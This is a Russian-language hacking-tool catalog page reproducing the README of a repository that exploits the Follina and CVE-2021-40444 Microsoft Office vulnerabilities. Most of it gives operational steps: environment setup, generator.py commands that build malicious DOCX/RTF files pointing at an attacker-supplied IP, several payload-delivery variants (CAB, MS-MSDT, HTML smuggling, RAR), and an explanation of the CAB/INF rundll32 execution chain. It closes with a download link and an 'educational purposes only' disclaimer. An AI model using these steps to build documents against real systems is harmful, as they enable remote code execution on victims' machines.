Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Follina-CVE-and-CVE-2021-40444 — Этот репозиторий содержит скрипты и ресурсы для эксплуатации уязвимостей Follina CVE и CVE-2021-40444 в Microsoft Office. Скрипты создают вредоносные файлы документов, которые могут выполнять произвольный код в целевой системе. | Kitploit
Инструменты/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программТестирование на ПроникновениеОбучение и Образование
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

Этот репозиторий содержит скрипты и ресурсы для эксплуатации уязвимостей Follina CVE и CVE-2021-40444 в Microsoft Office. Скрипты создают вредоносные файлы документов, которые могут выполнять произвольный код в целевой системе.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

Эксплуатация уязвимостей Follina CVE и CVE-2021-40444

Содержание

  1. Введение
  2. Предварительные требования
  3. Установка и настройка
  4. Использование
  5. Подробное объяснение
  6. Команды
  7. Отказ от ответственности

Введение

Этот репозиторий содержит скрипты и ресурсы для эксплуатации уязвимостей Follina CVE и CVE-2021-40444 в Microsoft Office. Скрипты создают вредоносные файлы документов, которые могут выполнять произвольный код на целевой системе.

Предварительные требования

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • Требуемые пакеты Python (перечислены в requirements.txt)

Установка и настройка

  1. Настройка Flare VM:

    • Убедитесь, что у вас установлена Flare VM. Учётные данные для ВМ:
      • Имя пользователя: lab
      • Пароль: password
  2. Python и виртуальное окружение:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • Убедитесь, что Python и pip установлены в виртуальной машине.
    • Установите пакет virtualenv с помощью следующей команды:
      root@kitploit:~
      pip install virtualenv
      
    • Создайте виртуальное окружение с именем venv:
      root@kitploit:~
      python -m virtualenv venv
      
    • Активируйте виртуальное окружение:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • Установите требуемые пакеты:
      root@kitploit:~
      pip install -r requirements.txt
      

Использование

  1. Генерация эксплойта:

    • Перейдите в каталог проекта и выполните следующую команду для генерации эксплойта:
      root@kitploit:~
      python generator.py -u http://192.168.197.132 -P test\calc.dll --host
      
      Замените 192.168.197.132 на ваш IP-адрес.
  2. Доступ к сгенерированному документу:

    • Сгенерированный файл .docx будет находиться в каталоге:
      root@kitploit:~
      C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
      

Подробное объяснение

Цепочка эксплуатации

  • Документ (.docx) открывается.
  • Документ содержит связь, указывающую на вредоносный HTML, хранящийся в document.xml.rels.
  • HTML-ссылка открывается в предварительном просмотре IE.
  • Объект указывает на CAB-файл и iframe, указывающий на INF-файл, оба встроены в JScript и имеют префикс директивы ".cpl:".
  • CAB-файл открывается, сохраняя INF-файл в каталоге %TEMP%Low.
  • INF-файл открывается с помощью директивы ".cpl:", что заставляет rundll32 выполнить боковую загрузку INF-файла.

Обзор скриптов

generator.py

  • Реализует эксплойт для CVE-2021-40444, позволяющий удалённое выполнение кода через Microsoft Office.
  • Содержит различные вспомогательные функции для патчинга CAB-файлов, создания RAR-файлов, генерации полезных нагрузок и многого другого.

cab_parser.py

  • Инструмент для просмотра заголовков CAB-файлов.
  • Определяет классы и методы для обработки и разбора CAB-файлов.

Раздел 2.0: Настройка в Flare VM

  • Установите необходимые инструменты и пакеты.
  • Создайте и активируйте виртуальное окружение.
  • Установите пакеты Python из requirements.txt.

Команды

  • Сгенерируйте оригинальный эксплойт и протестируйте локально:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.dll --host
    
  • Сгенерируйте эксплойт без CAB с использованием MS-MSDT (атака Follina) в документах DOCX и RTF:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
    
  • Сгенерируйте эксплойт без CAB (только IE) с HTML-смагглингом и протестируйте локально через IE:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
    
  • Сгенерируйте эксплойт без CAB с RAR и протестируйте локально через IE:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
    

Отказ от ответственности

Этот проект предназначен только для образовательных целей. Используйте его ответственно и не эксплуатируйте уязвимости на системах, которые вам не разрешено тестировать. Неправильное использование этой информации может привести к уголовной ответственности.

Скачать инструмент